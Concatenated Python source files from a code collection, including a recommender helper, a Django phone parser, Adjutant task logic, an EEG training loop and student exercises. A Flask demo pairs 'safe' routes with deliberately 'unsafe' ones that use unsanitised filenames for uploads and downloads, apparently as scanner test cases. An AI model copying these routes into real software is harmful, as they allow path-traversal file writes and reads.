adjusted_movie_means, (len(adjusted_user_deviation), 1))
u_matrix = np.tile(
adjusted_user_deviation, (len(adjusted_movie_means), 1)).T
data = np.multiply(m_matrix, d_matrix) + \
np.multiply(u_matrix, np.ones(d_matrix.shape) - d_matrix)
return data
def compute_rmse(data, prediction, indices=None):
if indices is None:
indices = get_indices_from_file(VALIDATION_FILE_NAME)
squared_error = 0
for i, j in indices:
squared_error += (data[i][j] - prediction[i][j]) ** 2
return np.sqrt(squared_error / len(indices))
def knn_smoothing(reconstruction, user_embeddings):
normalized_user_embeddings = normalize(user_embeddings)
knn = NearestNeighbors(n_neighbors=N_NEIGHBORS + 1)
knn.fit(normalized_user_embeddings)
distances, neighbors = knn.kneighbors(normalized_user_embeddings)
distances = distances[:, 1:]
neighbors = neighbors[:, 1:]
ones = np.ones(distances.shape)
similarities = ones - distances
weights = np.square(np.square(similarities))
smoothed_data = np.zeros(reconstruction.shape)
aggregated_neighbor_ratings = np.zeros(reconstruction.shape)
for i in range(reconstruction.shape[0]):
stacked_ratings = []
for neighbor in neighbors[i]:
stacked_ratings.append(reconstruction[neighbor])
stacked_ratings = np.asarray(stacked_ratings)
aggregated_neighbor_ratings[i] =\
np.matmul(weights[i], stacked_ratings) / sum(weights[i])
for i in range(reconstruction.shape[0]):
smoothed_data[i] = (1 - WEIGHT_KNN) * reconstruction[i] + WEIGHT_KNN *\
aggregated_neighbor_ratings[i]
smoothed_data = clip(smoothed_data)
return smoothed_data
def load_predictions_from_files(file_prefix='submission_'):
path = os.path.join(ROOT_DIR, ENSEMBLE_INPUT_DIR)
files = [os.path.join(path, i) for i in os.listdir(path) if \
os.path.isfile(os.path.join(path, i)) and file_prefix in i]
all_ratings = []
for file in files:
print("loading {}".format(file))
ratings = load_ratings(file)
ratings = ratings_to_matrix(ratings)
all_ratings.append(ratings)
return all_ratings
def compute_mean_predictions(all_ratings):
reconstruction = np.mean(np.array(all_ratings), axis=0)
reconstruction = impute_by_avg(reconstruction, by_row=False)
return reconstruction
|
7,676 | 87562ce2a957de3fa2eb84cbb0de18c6ce264c6b | # -*- coding: utf-8 -*-
"""
This file is part of pyCMBS.
(c) 2012- Alexander Loew
For COPYING and LICENSE details, please refer to the LICENSE file
"""
import unittest
from pycmbs import data4D
class TestPycmbsData4D(unittest.TestCase):
def setUp(self):
pass
def test_DummyTest(self):
pass
if __name__ == "__main__":
unittest.main()
|
7,677 | 3e19ede2112a109a776b607e927e2f0a095ba5cc | from .__init__ import *
def surfaceAreaCone(maxRadius=20, maxHeight=50, unit='m'):
a = random.randint(1, maxHeight)
b = random.randint(1, maxRadius)
slopingHeight = math.sqrt(a**2 + b**2)
problem = f"Surface area of cone with height = {a}{unit} and radius = {b}{unit} is"
ans = int(math.pi * b * slopingHeight + math.pi * b * b)
solution = f"{ans} {unit}^2"
return problem, solution
surface_area_cone = Generator(
"Surface Area of cone", 38,
"Surface area of cone with height = a units and radius = b units is",
"c units^2", surfaceAreaCone)
|
7,678 | d27a7ca04e12d50aca5a9f9db199102dbeb4e9f1 | from django.http import JsonResponse
from django.shortcuts import render
from phone_number_parser.forms import TextForm
import re
def parse_text(request):
###########################################################################
#
# Parse Text is the lone view for this project. A GET request renders a
# form with one textarea field. A POST of this form passes the text via an
# ajax call in the field 'the_text'. The text is parsed using REGEX for
# phone numbers and passed back as a JSON object.
# See main.js for the ajax request and success callback function.
#
###########################################################################
if request.method == 'POST':
text = request.POST.get('the_text')
phone_number_list = []
matches = re.findall(r'\(?(\d{3})\)?[\.\-]?\s*(\d{3})\s*[\.\-]?\s*(\d{4})', text)
for match in matches:
phone_number_list.append('({}) {}-{}'.format(match[0], match[1], match[2]))
response_data = {'phone_number_list': phone_number_list}
return JsonResponse(response_data)
else:
form = TextForm()
return render(request, 'phone_number_parser/index.html', {'form': form})
|
7,679 | 9f6cfeff9e00079715827a2887263c14a1bb51ff | import os, tempfile, shutil
from flask import Flask, flash, request, redirect, url_for, send_from_directory, send_file
from werkzeug.utils import secure_filename
from contextlib import contextmanager
"""
Flask stores uploaded FileStorage objects in memory if they are small. Otherwise, it internally uses tempfile.gettempdir() which returns the globally
configured temporary directory that tempfile is using.
WARNING: Flask accepts an unlimited file size unless I limit it
Flask encourages the use of <FileStorage>.save() to save uploaded files on the server. Afterwards, I can interact with the files normally. There does
not appear to be an easy way to directly interact with a FileStorage object with such functions as open()
"""
#UPLOAD_FOLDER = './uploads'
ALLOWED_EXTENSIONS = set(['txt', 'pdf', 'png', 'jpg', 'jpeg', 'gif'])
app = Flask(__name__)
# Limit the file size fo 16 MB
app.config['MAX_CONTENT_LENGTH'] = 16 * 1024 * 1024
# I want each user to have their own upload folder
#app.config['UPLOAD_FOLDER'] = UPLOAD_FOLDER
def allowed_file(filename):
return '.' in filename and filename.rsplit('.', 1)[1].lower() in ALLOWED_EXTENSIONS
"""
Upload a text file and the server will process the file by writing a single line to it and returning the modified file. The temporary directory where
the file was saved (and modified) is deleted at the end of the request. It works exactly as expected! Try stepping through it.
"""
@app.route('/', methods=['GET', 'POST'])
def upload_file():
if request.method == 'POST':
# check if the post request has the file part
if 'file' not in request.files:
flash('No file part')
return redirect(request.url)
f = request.files['file']
# if the user does not select file, browser should also submit an empty part without filename
if f.filename == '':
flash('No selected file')
return redirect(request.url)
if f and allowed_file(f.filename):
"""
This code is fine because 'with' acts like a finally block. The context manager will always exit (unless the program abnormally
terminates), even if an exception is thrown or return is called within the 'with' block. Thus, I can send the processed file to the
client and then the entire directory will be deleted.
"""
filename = secure_filename(f.filename)
with TemporaryDirectory() as temp_dir:
print("temp_dir was: " + temp_dir)
path = os.path.join(temp_dir, filename)
f.save(path)
#f.save(os.path.join(app.config['UPLOAD_FOLDER'], filename))
with open(path, "r+") as my_file:
my_file.write("The server wrote this line.\n")
return send_from_directory(temp_dir, filename)
#return redirect(url_for('uploaded_file', filename=filename))
return '''
<!doctype html>
<title>Upload new File</title>
<h1>Upload new File</h1>
<form method=post enctype=multipart/form-data>
<input type=file name=file>
<input type=submit value=Upload>
</form>
'''
# Send the uploaded file right back to the user as an example. I don't do this because I process the file and spit it back to the user
"""
@app.route('/uploads/<filename>')
def uploaded_file(filename):
return send_from_directory(app.config['UPLOAD_FOLDER'], filename)
"""
# Create a context manager to deal with automatically deleting the temporary directory when the 'with' statement exists
@contextmanager
def TemporaryDirectory():
name = tempfile.mkdtemp()
try:
yield name
finally:
shutil.rmtree(name)
@app.route("/safe", methods=["POST"])
def safe():
f = request.files["file-form-param"]
name = secure_filename(f.filename)
filepath = os.path.join(os.path.dirname(__file__), "uploads", name)
f.save(filepath)
return str({
"filename": name,
"saved at": filepath
})
@app.route("/unsafe", methods=["POST"])
def unsafe():
f = request.files["file-form-param"]
filepath = os.path.join(os.path.dirname(__file__), "uploads", f.filename)
f.save(filepath)
return str({
"filename": f.filename,
"saved at": filepath
})
@app.route("/sendfile", methods=["POST"])
def send_file_py():
filename = request.form.get("filename")
return send_file(os.path.join(os.path.dirname(__file__), "uploads", filename))
@app.route("/sendfromdirectory", methods=["POST"])
def send_from_directory_py():
filename = request.form.get("filename")
return send_from_directory(os.path.join(os.path.dirname(__file__), "uploads"), filename)
|
7,680 | 26a6fe0b2a98aa77b63a336cd6c2afcfe81d9058 | #!/usr/bin/env python3
import os
import subprocess
import emailgen
#
# Header information
#
recipient = input("recipient: ")
sender = input("sender: ")
password = input("sender password: ")
subject = "hdd temp alert"
#
# Get hdd temp, format for email
#
output = subprocess.check_output('sudo hddtemp /dev/sda /dev/sdb /dev/sdc', shell=True)
text = output.decode('utf-8')
#
# Email requires ascii
#
text = text.encode('ascii','ignore')
text = text.decode('ascii')
#
# Add descriptive information to text
#
text += "\nHostname: " + os.uname().nodename
#
# Call sendAlert function
#
emailgen.sendAlert(recipient, subject, text, sender, password)
|
7,681 | cc23eeed44ff66d68c700163cca8b9f4986d497d | # Copyright (C) 2019 Catalyst Cloud Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import hashlib
from logging import getLogger
from confspirator import groups
from confspirator import fields
from adjutant import actions as adj_actions
from adjutant.api.models import Task
from adjutant.config import CONF
from django.utils import timezone
from adjutant.notifications.utils import create_notification
from adjutant.tasks.v1.utils import send_stage_email, create_token, handle_task_error
from adjutant import exceptions
def make_task_config(task_class):
config_group = groups.DynamicNameConfigGroup()
config_group.register_child_config(
fields.BoolConfig(
"allow_auto_approve",
help_text="Override if this task allows auto_approval. "
"Otherwise uses task default.",
default=task_class.allow_auto_approve,
)
)
config_group.register_child_config(
fields.ListConfig(
"additional_actions",
help_text="Additional actions to be run as part of the task "
"after default actions.",
default=task_class.additional_actions or [],
)
)
config_group.register_child_config(
fields.IntConfig(
"token_expiry",
help_text="Override for the task token expiry. "
"Otherwise uses task default.",
default=task_class.token_expiry,
)
)
config_group.register_child_config(
fields.DictConfig(
"actions",
help_text="Action config overrides over the action defaults. "
"See 'adjutant.workflow.action_defaults'.",
is_json=True,
default=task_class.action_config or {},
sample_default={
"SomeCustomAction": {"some_action_setting": "<a-uuid-probably>"}
},
)
)
config_group.register_child_config(
fields.DictConfig(
"emails",
help_text="Email config overrides for this task over task defaults."
"See 'adjutant.workflow.emails'.",
is_json=True,
default=task_class.email_config or {},
sample_default={
"initial": None,
"token": {
"subject": "Some custom subject",
},
},
)
)
config_group.register_child_config(
fields.DictConfig(
"notifications",
help_text="Notification config overrides for this task over task defaults."
"See 'adjutant.workflow.notifications'.",
is_json=True,
default=task_class.notification_config or {},
sample_default={
"standard_handlers": ["EmailNotification"],
"error_handlers": ["EmailNotification"],
"standard_handler_config": {
"EmailNotification": {
"emails": ["example@example.com"],
"reply": "no-reply@example.com",
}
},
"error_handler_config": {
"EmailNotification": {
"emails": ["example@example.com"],
"reply": "no-reply@example.com",
}
},
},
)
)
return config_group
class BaseTask(object):
"""
Base class for in memory task representation.
This serves as the internal task logic handler, and is used to
define what a task looks like.
Most of the time this class shouldn't be called or used directly
as the task manager is what handles the direct interaction to the
logic here, and includes some wrapper logic to help deal with workflows.
"""
# required values in custom task
task_type = None
default_actions = None
# default values to optionally override in task definition
deprecated_task_types = None
duplicate_policy = "cancel"
send_approval_notification = True
token_requires_authentication = False
# config defaults for the task (used to generate default config):
allow_auto_approve = True
additional_actions = None
token_expiry = None
action_config = None
email_config = None
notification_config = None
def __init__(self, task_model=None, task_data=None, action_data=None):
self._config = None
self.logger = getLogger("adjutant")
if task_model:
self.task = task_model
self._refresh_actions()
else:
# raises 400 validation error
action_serializer_list = self._instantiate_action_serializers(action_data)
hash_key = self._create_task_hash(action_serializer_list)
# raises duplicate error
self._handle_duplicates(hash_key)
keystone_user = task_data.get("keystone_user", {})
self.task = Task.objects.create(
keystone_user=keystone_user,
project_id=keystone_user.get("project_id"),
task_type=self.task_type,
hash_key=hash_key,
)
self.task.save()
# Instantiate actions with serializers
self.actions = []
for i, action in enumerate(action_serializer_list):
data = action["serializer"].validated_data
# construct the action class
self.actions.append(
action["action"](data=data, task=self.task, order=i)
)
self.logger.info(
"(%s) - '%s' task created (%s)."
% (timezone.now(), self.task_type, self.task.uuid)
)
def _instantiate_action_serializers(self, action_data, use_existing_actions=False):
action_serializer_list = []
if use_existing_actions:
actions = self.actions
else:
actions = self.default_actions[:]
actions += self.config.additional_actions
# instantiate all action serializers and check validity
valid = True
for action in actions:
if use_existing_actions:
action_name = action.action.action_name
else:
action_name = action
action_class = adj_actions.ACTION_CLASSES[action_name]
if use_existing_actions:
action_class = action
# instantiate serializer class
if not action_class.serializer:
raise exceptions.SerializerMissingException(
"No serializer defined for action %s" % action_name
)
serializer = action_class.serializer(data=action_data)
action_serializer_list.append(
{"name": action_name, "action": action_class, "serializer": serializer}
)
if serializer and not serializer.is_valid():
valid = False
if not valid:
errors = {}
for action in action_serializer_list:
if action["serializer"]:
errors.update(action["serializer"].errors)
raise exceptions.TaskSerializersInvalid(errors)
return action_serializer_list
def _create_task_hash(self, action_list):
hashable_list = [
self.task_type,
]
for action in action_list:
hashable_list.append(action["name"])
if not action["serializer"]:
continue
# iterate like this to maintain consistent order for hash
fields = sorted(action["serializer"].validated_data.keys())
for field in fields:
try:
hashable_list.append(action["serializer"].validated_data[field])
except KeyError:
if field == "username" and CONF.identity.username_is_email:
continue
else:
raise
return hashlib.sha256(str(hashable_list).encode("utf-8")).hexdigest()
def _handle_duplicates(self, hash_key):
duplicate_tasks = Task.objects.filter(
hash_key=hash_key, completed=0, cancelled=0
)
if not duplicate_tasks:
return
if self.duplicate_policy == "cancel":
now = timezone.now()
self.logger.info("(%s) - Task is a duplicate - Cancelling old tasks." % now)
for task in duplicate_tasks:
task.add_task_note(
"Task cancelled because was an old duplicate. - (%s)" % now
)
task.get_task().cancel()
return
raise exceptions.TaskDuplicateFound()
def _refresh_actions(self):
self.actions = [a.get_action() for a in self.task.actions]
def _create_token(self):
self.clear_tokens()
token_expiry = self.config.token_expiry or self.token_expiry
token = create_token(self.task, token_expiry)
self.add_note("Token created for task.")
try:
# will throw a key error if the token template has not
# been specified
email_conf = self.config.emails.token
send_stage_email(self.task, email_conf, token)
except KeyError as e:
handle_task_error(e, self.task, error_text="while sending token")
def add_note(self, note):
"""
Logs the note, and also adds it to the task notes.
"""
now = timezone.now()
self.logger.info(
"(%s)(%s)(%s) - %s" % (now, self.task_type, self.task.uuid, note)
)
note = "%s - (%s)" % (note, now)
self.task.add_task_note(note)
@property
def config(self):
"""Get my config.
Returns a dict of the config for this task.
"""
if self._config is None:
try:
task_conf = CONF.workflow.tasks[self.task_type]
except KeyError:
task_conf = {}
self._config = CONF.workflow.task_defaults.overlay(task_conf)
return self._config
def is_valid(self, internal_message=None):
self._refresh_actions()
valid = all([act.valid for act in self.actions])
if not valid:
# TODO(amelia): get action invalidation reasons and raise those
raise exceptions.TaskActionsInvalid(
self.task, "actions invalid", internal_message
)
@property
def approved(self):
return self.task.approved
@property
def completed(self):
return self.task.completed
@property
def cancelled(self):
return self.task.cancelled
def confirm_state(self, approved=None, completed=None, cancelled=None):
"""Check that the Task is in a given state.
None value means state is ignored. Otherwise expects true or false.
"""
if completed is not None:
if self.task.completed and not completed:
raise exceptions.TaskStateInvalid(
self.task, "This task has already been completed."
)
if not self.task.completed and completed:
raise exceptions.TaskStateInvalid(
self.task, "This task hasn't been completed."
)
if cancelled is not None:
if self.task.cancelled and not cancelled:
raise exceptions.TaskStateInvalid(
self.task, "This task has been cancelled."
)
if not self.task.cancelled and cancelled:
raise exceptions.TaskStateInvalid(
self.task, "This task has not been cancelled."
)
if approved is not None:
if self.task.approved and not approved:
raise exceptions.TaskStateInvalid(
self.task, "This task has already been approved."
)
if not self.task.approved and approved:
raise exceptions.TaskStateInvalid(
self.task, "This task has not been approved."
)
def update(self, action_data):
self.confirm_state(approved=False, completed=False, cancelled=False)
action_serializer_list = self._instantiate_action_serializers(
action_data, use_existing_actions=True
)
hash_key = self._create_task_hash(action_serializer_list)
self._handle_duplicates(hash_key)
for action in action_serializer_list:
data = action["serializer"].validated_data
action["action"].action.action_data = data
action["action"].action.save()
self._refresh_actions()
self.prepare()
def prepare(self):
"""Run the prepare stage for all the actions.
If the task can be auto approved, this will also run the approve
stage.
"""
self.confirm_state(approved=False, completed=False, cancelled=False)
for action in self.actions:
try:
action.prepare()
except Exception as e:
handle_task_error(e, self.task, error_text="while setting up task")
# send initial confirmation email:
email_conf = self.config.emails.initial
send_stage_email(self.task, email_conf)
approve_list = [act.auto_approve for act in self.actions]
# TODO(amelia): It would be nice to explicitly test this, however
# currently we don't have the right combinations of
# actions to allow for it.
if False in approve_list:
can_auto_approve = False
elif True in approve_list:
can_auto_approve = True
else:
can_auto_approve = False
if self.config.allow_auto_approve is not None:
allow_auto_approve = self.config.allow_auto_approve
else:
allow_auto_approve = self.allow_auto_approve
if can_auto_approve and not allow_auto_approve:
self.add_note("Actions allow auto aproval, but task does not.")
elif can_auto_approve:
self.add_note("Action allow auto approval. Auto approving.")
self.approve()
return
if self.send_approval_notification:
notes = {"notes": ["'%s' task needs approval." % self.task_type]}
create_notification(self.task, notes)
def approve(self, approved_by="system"):
"""Run the approve stage for all the actions."""
self.confirm_state(completed=False, cancelled=False)
self.is_valid("task invalid before approval")
# We approve the task before running actions,
# that way if something goes wrong we know if it was approved,
# when it was approved, and who approved it.
self.task.approved = True
self.task.approved_on = timezone.now()
self.task.approved_by = approved_by
self.task.save()
# approve all actions
for action in self.actions:
try:
action.approve()
except Exception as e:
handle_task_error(e, self.task, error_text="while approving task")
self.is_valid("task invalid after approval")
need_token = any([act.need_token for act in self.actions])
if need_token:
self._create_token()
else:
self.submit()
def reissue_token(self):
self.confirm_state(approved=True, completed=False, cancelled=False)
need_token = any([act.need_token for act in self.actions])
if need_token:
self._create_token()
def clear_tokens(self):
for token in self.task.tokens:
token.delete()
def submit(self, token_data=None, keystone_user=None):
self.confirm_state(approved=True, completed=False, cancelled=False)
required_fields = set()
actions = []
for action in self.task.actions:
a = action.get_action()
actions.append(a)
for field in a.token_fields:
required_fields.add(field)
if not token_data:
token_data = {}
errors = {}
data = {}
for field in required_fields:
try:
data[field] = token_data[field]
except KeyError:
errors[field] = [
"This field is required.",
]
except TypeError:
errors = ["Improperly formated json. " "Should be a key-value object."]
break
if errors:
raise exceptions.TaskTokenSerializersInvalid(self.task, errors)
self.is_valid("task invalid before submit")
for action in actions:
try:
action.submit(data, keystone_user)
except Exception as e:
handle_task_error(e, self.task, "while submiting task")
self.is_valid("task invalid after submit")
self.task.completed = True
self.task.completed_on = timezone.now()
self.task.save()
for token in self.task.tokens:
token.delete()
# Sending confirmation email:
email_conf = self.config.emails.completed
send_stage_email(self.task, email_conf)
def cancel(self):
self.confirm_state(completed=False, cancelled=False)
self.clear_tokens()
self.task.cancelled = True
self.task.save()
|
7,682 | 6ef78e4308f6e693f50df714a5d7af1785e49d7a |
from utils import *
import copy
import torch.nn as nn
CUDA = torch.cuda.is_available()
def train_one_epoch(data_loader, net, loss_fn, optimizer):
net.train()
tl = Averager()
pred_train = []
act_train = []
for i, (x_batch, y_batch) in enumerate(data_loader):
if CUDA:
x_batch, y_batch = x_batch.cuda(), y_batch.cuda()
out = net(x_batch)
loss = loss_fn(out, y_batch)
_, pred = torch.max(out, 1)
tl.add(loss)
pred_train.extend(pred.data.tolist())
act_train.extend(y_batch.data.tolist())
optimizer.zero_grad()
loss.backward()
optimizer.step()
return tl.item(), pred_train, act_train
def predict(data_loader, net, loss_fn):
net.eval()
pred_val = []
act_val = []
vl = Averager()
with torch.no_grad():
for i, (x_batch, y_batch) in enumerate(data_loader):
if CUDA:
x_batch, y_batch = x_batch.cuda(), y_batch.cuda()
out = net(x_batch)
loss = loss_fn(out, y_batch)
_, pred = torch.max(out, 1)
vl.add(loss.item())
pred_val.extend(pred.data.tolist())
act_val.extend(y_batch.data.tolist())
return vl.item(), pred_val, act_val
def set_up(args):
set_gpu(args.gpu)
ensure_path(args.save_path)
torch.manual_seed(args.random_seed)
torch.backends.cudnn.deterministic = True
def train(args, data_train, label_train, data_val, label_val, subject, fold):
seed_all(args.random_seed)
save_name = '_sub' + str(subject) + '_trial' + str(fold)
set_up(args)
train_loader = get_dataloader(data_train, label_train, args.batch_size)
val_loader = get_dataloader(data_val, label_val, args.batch_size)
model = get_model(args)
para = get_trainable_parameter_num(model)
print('Model {} size:{}'.format(args.model, para))
if CUDA:
model = model.cuda()
optimizer = torch.optim.Adam(model.parameters(), lr=args.learning_rate)
loss_fn = nn.CrossEntropyLoss()
def save_model(name):
previous_model = osp.join(args.save_path, '{}.pth'.format(name))
if os.path.exists(previous_model):
os.remove(previous_model)
torch.save(model.state_dict(), osp.join(args.save_path, '{}.pth'.format(name)))
trlog = {}
trlog['args'] = vars(args)
trlog['train_loss'] = []
trlog['val_loss'] = []
trlog['train_acc'] = []
trlog['val_acc'] = []
trlog['max_acc'] = 0.0
timer = Timer()
for epoch in range(1, args.max_epoch + 1):
loss_train, pred_train, act_train = train_one_epoch(
data_loader=train_loader, net=model, loss_fn=loss_fn, optimizer=optimizer)
acc_train, f1_train, _ = get_metrics(y_pred=pred_train, y_true=act_train)
print('epoch {}, loss={:.4f} acc={:.4f} f1={:.4f}'
.format(epoch, loss_train, acc_train, f1_train))
loss_val, pred_val, act_val = predict(
data_loader=val_loader, net=model, loss_fn=loss_fn
)
acc_val, f1_val, _ = get_metrics(y_pred=pred_val, y_true=act_val)
print('epoch {}, val, loss={:.4f} acc={:.4f} f1={:.4f}'.
format(epoch, loss_val, acc_val, f1_val))
if acc_val > trlog['max_acc']:
trlog['max_acc'] = acc_val
save_model('max-acc')
if args.save_model:
# save model here for reproduce
model_name_reproduce = 'sub' + str(subject) + '_fold' + str(fold) + '.pth'
data_type = 'model_{}_{}_{}'.format(args.dataset, args.data_format, args.label_type)
save_path = osp.join(args.save_path, data_type)
ensure_path(save_path)
model_name_reproduce = osp.join(save_path, model_name_reproduce)
torch.save(model.state_dict(), model_name_reproduce)
trlog['train_loss'].append(loss_train)
trlog['train_acc'].append(acc_train)
trlog['val_loss'].append(loss_val)
trlog['val_acc'].append(acc_val)
print('ETA:{}/{} SUB:{} FOLD:{}'.format(timer.measure(), timer.measure(epoch / args.max_epoch),
subject, fold))
save_name_ = 'trlog' + save_name
ensure_path(osp.join(args.save_path, 'log_train'))
torch.save(trlog, osp.join(args.save_path, 'log_train', save_name_))
return trlog['max_acc']
def test(args, data, label, reproduce, subject, fold):
seed_all(args.random_seed)
set_up(args)
test_loader = get_dataloader(data, label, args.batch_size, False)
model = get_model(args)
if CUDA:
model = model.cuda()
loss_fn = nn.CrossEntropyLoss()
if reproduce:
model_name_reproduce = 'sub' + str(subject) + '_fold' + str(fold) + '.pth'
data_type = 'model_{}_{}_{}'.format(args.dataset, args.data_format, args.label_type)
save_path = osp.join(args.save_path, data_type)
ensure_path(save_path)
model_name_reproduce = osp.join(save_path, model_name_reproduce)
model.load_state_dict(torch.load(model_name_reproduce))
else:
model.load_state_dict(torch.load(args.load_path))
loss, pred, act = predict(
data_loader=test_loader, net=model, loss_fn=loss_fn
)
acc, f1, cm = get_metrics(y_pred=pred, y_true=act)
print('>>> Test: loss={:.4f} acc={:.4f} f1={:.4f}'.format(loss, acc, f1))
return acc, pred, act
|
7,683 | 14d31a4b7491a7f7a64cd151e79c23546e4a3cd2 | #ABC114 A - クイズ
print("ABC" if input()=="1" else "chokudai")
|
7,684 | aaa9665ac6d639e681fddd032058f490ce36d12a | from django.shortcuts import render
from django.views.generic import DetailView
from .models import Course
# Create your views here.
def courses_list_view(request):
products = Course.objects.all()
title = "دوره ها"
context = {
"object_list": products,
"title": title,
}
return render(request, "courses/courses_list.html", context)
class CoursesDetailView(DetailView):
queryset = Course.objects.all()
template_name = "courses/course.html"
def get_context_data(self, *args, object_list=None, **kwargs):
context = super(CoursesDetailView, self).get_context_data(*args, **kwargs)
print(context)
return context
|
7,685 | ba26aa2f33983019b515c5ea287bd5d5d190eeac | N,M=map(int,input().split())
if N>=M//2:
print(M//2)
else:
answer=N
M-=2*N
N=0
print(answer+M//4) |
7,686 | ca6a9656efe439c9e90f2724e38e652a09e46dae | """
Test 1, problem 1.
Authors: David Mutchler, Dave Fisher, Valerie Galluzzi, Amanda Stouder,
their colleagues and Nathan Gupta. March 2016.
""" # DONE: 1. PUT YOUR NAME IN THE ABOVE LINE.
def main():
""" Calls the TEST functions in this module. """
test_problem1a()
test_problem1b()
test_problem1c()
def is_palindrome(n):
"""
What comes in: An non-negative integer n.
What goes out: Returns True if the given integer is a palindrome,
that is, if it reads the same backwards and forwards.
Returns False if the given integer is not a palindrome.
Side effects: None.
Examples:
-- if n is 12344321 this function returns True
-- if n is 121121 this function returns True
-- if n is 372273 this function returns True
-- if n is 88 this function returns True
-- if n is 808 this function returns True
-- if n is 1 this function returns True
-- if n is 6556 this function returns True
-- if n is 6557 this function returns False
-- if n is 228 this function returns False
-- if n is 81 this function returns False
"""
####################################################################
# Ask your instructor for help if you do not understand
# the green doc-string above.
####################################################################
forwards = str(n)
backwards = str(n)[::-1]
return forwards == backwards
# ------------------------------------------------------------------
# Students:
# Do NOT touch the above is_palindrome function
# - it has no TODO.
# Do NOT copy code from this function.
#
# Instead, ** CALL ** this function as needed in the problems below.
# ------------------------------------------------------------------
def is_prime(n):
"""
What comes in: An integer n >= 2.
What goes out: True if the given integer is prime, else False.
Side effects: None.
Examples:
-- is_prime(11) returns True
-- is_prime(12) returns False
-- is_prime(2) returns True
Note: The algorithm used here is simple and clear but slow.
"""
for k in range(2, (n // 2) + 1):
if n % k == 0:
return False
return True
# ------------------------------------------------------------------
# Students:
# Do NOT touch the above is_prime function - it has no TODO.
# Do NOT copy code from this function.
#
# Instead, ** CALL ** this function as needed in the problems below.
# ------------------------------------------------------------------
def test_problem1a():
""" Tests the problem1a function. """
# ------------------------------------------------------------------
# DONE: 2. Implement this TEST function.
# It TESTS the problem1a function defined below.
# Include at least ** 5 ** tests.
#
# Use the same 4-step process as for previous TEST functions.
# In particular, include both EXPECTED and ACTUAL results.
# ------------------------------------------------------------------
print()
print('--------------------------------------------------')
print('Testing the problem1a function:')
print('--------------------------------------------------')
expected = 95
answer = problem1a(5, 2)
print('Test 1 expected:', expected)
print(' actual: ', answer)
expected = 1576
answer = problem1a(10, 3)
print('Test 2 expected:', expected)
print(' actual: ', answer)
expected = 32312
answer = problem1a(15, 4)
print('Test 3 expected:', expected)
print(' actual: ', answer)
expected = 639655
answer = problem1a(20, 5)
print('Test 4 expected:', expected)
print(' actual: ', answer)
expected = 13321704
answer = problem1a(25, 6)
print('Test 5 expected:', expected)
print(' actual: ', answer)
# This test takes some time to finish but it does work.
expected = 283359305
answer = problem1a(30, 7)
print('Test 6 expected:', expected)
print(' actual: ', answer)
def problem1a(m, p):
"""
What comes in: Positive integers m and p,
with m >= 2 and (5 raised to the pth power) >= m.
What goes out: Returns the sum of all the integers
between m and (5 raised to the pth power), inclusive,
that are prime.
Side effects: None.
Examples:
-- If m is 11 and p = 2, this function returns 83,
because the sum of the primes
between 4 and (5 to the 2nd power, i.e. 25) is:
11 + 13 + 17 + 19 + 23, which is 83.
-- If m is 70 and p = 3, this function returns 1025,
because the sum of the primes between 70 and
(5 to the 3rd power, i.e. 125) is:
71 + 73 + 79 + 83 + 89 + 97 + 101 + 103 + 107 + 109 + 113,
which is 1025.
-- If m is 2 and p = 1, this function returns 10,
because the sum of the primes between 2 and
(5 to the 1st power, i.e. 5) is:
2 + 3 + 5, which is 10.
-- If m is 1000 and p = 6,
this function returns 13245677 (trust me!)
"""
# ------------------------------------------------------------------
# DONE: 3. Implement and test this function.
# Note that you should write its TEST function first (above).
#
####################################################################
# IMPORTANT:
# ** For full credit you must appropriately use (call)
# ** the is_prime function that is defined above.
####################################################################
# ------------------------------------------------------------------
tot = 0
for i in range(m, 5 ** p + 1):
if is_prime(i) == True:
tot = tot + i
return tot
def test_problem1b():
""" Tests the problem1b function. """
print()
print('--------------------------------------------------')
print('Testing the problem1b function:')
print('--------------------------------------------------')
####################################################################
# THESE TESTS ARE ALREADY DONE. DO NOT CHANGE THEM.
# You may add more tests if you want,
# but you are not required to do so.
####################################################################
# Test 1:
expected = True
answer = problem1b(17, 2)
print()
print('Test 1 expected:', expected)
print(' actual: ', answer)
if expected != answer:
print(' **** THIS TEST FAILED. ****')
# Test 2:
expected = False
answer = problem1b(18, 2)
print()
print('Test 2 expected:', expected)
print(' actual: ', answer)
if expected != answer:
print(' **** THIS TEST FAILED. ****')
# Test 3:
expected = True
answer = problem1b(85, 3)
print()
print('Test 3 expected:', expected)
print(' actual: ', answer)
if expected != answer:
print(' **** THIS TEST FAILED. ****')
# Test 4:
expected = True
answer = problem1b(89, 3)
print()
print('Test 4 expected:', expected)
print(' actual: ', answer)
if expected != answer:
print(' **** THIS TEST FAILED. ****')
# Test 5:
expected = False
answer = problem1b(90, 3)
print()
print('Test 5 expected:', expected)
print(' actual: ', answer)
if expected != answer:
print(' **** THIS TEST FAILED. ****')
# Test 6:
expected = False
answer = problem1b(449, 4)
print()
print('Test 6 expected:', expected)
print(' actual: ', answer)
if expected != answer:
print(' **** THIS TEST FAILED. ****')
# Test 7:
expected = True
answer = problem1b(450, 4)
print()
print('Test 7 expected:', expected)
print(' actual: ', answer)
if expected != answer:
print(' **** THIS TEST FAILED. ****')
# Test 8:
expected = True
answer = problem1b(457, 4)
print()
print('Test 8 expected:', expected)
print(' actual: ', answer)
if expected != answer:
print(' **** THIS TEST FAILED. ****')
# Test 9:
expected = False
answer = problem1b(458, 4)
print()
print('Test 9 expected:', expected)
print(' actual: ', answer)
if expected != answer:
print(' **** THIS TEST FAILED. ****')
# Test 10:
expected = False
answer = problem1b(569, 5)
print()
print('Test 10 expected:', expected)
print(' actual: ', answer)
if expected != answer:
print(' **** THIS TEST FAILED. ****')
# Test 11:
expected = True
answer = problem1b(570, 5)
print()
print('Test 11 expected:', expected)
print(' actual: ', answer)
if expected != answer:
print(' **** THIS TEST FAILED. ****')
# Test 12:
expected = True
answer = problem1b(571, 5)
print()
print('Test 12 expected:', expected)
print(' actual: ', answer)
if expected != answer:
print(' **** THIS TEST FAILED. ****')
# Test 13:
expected = False
answer = problem1b(572, 5)
print()
print('Test 13 expected:', expected)
print(' actual: ', answer)
if expected != answer:
print(' **** THIS TEST FAILED. ****')
# Test 14:
expected = True
answer = problem1b(15610, 6)
print()
print('Test 14 expected:', expected)
